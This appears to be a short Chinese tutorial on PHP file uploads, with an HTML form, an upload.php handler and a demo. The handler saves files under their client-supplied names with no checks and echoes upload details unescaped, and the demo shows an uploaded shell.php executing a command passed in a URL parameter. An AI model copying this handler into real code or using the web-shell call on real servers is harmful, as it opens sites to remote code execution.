一個簡單的PHP上傳文件的例子:
upload.html
<html> <body> <form action="upload.php" method="post" enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="file" name="file" id="file" /> <br /> <input type="submit" name="submit" value="Submit" /> </form> </body> </html>
upload.php
<?php move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]); echo "Stored in: " . "upload/" . $_FILES["file"]["name"]; ?> <html> <head> <title>Upload complete</title> </head> <body> <h3>File upload succeeded...</h3> <ul> <li>Sent: <?php echo $_FILES['file']['name']; ?></li> <li>Size: <?php echo $_FILES['file']['size']; ?> bytes</li> <li>Type: <?php echo $_FILES['file']['type']; ?></li> </ul> </body> </html>
這里要注意兩點: 當表單里面有上傳文件的input時(即input='file'),表單form的enctype屬性要設置為multipart/form-data HTML文件上傳控件,我們一般使用<input type="file" >
演示:
上傳的shell.php 會被保存到upload目錄中
地址欄輸入: http://192.168.1.135/upload/shell.php?command=phpinfo();
參考:
http://www.programgo.com/article/64921043351/
http://www.manongjc.com/article/983.html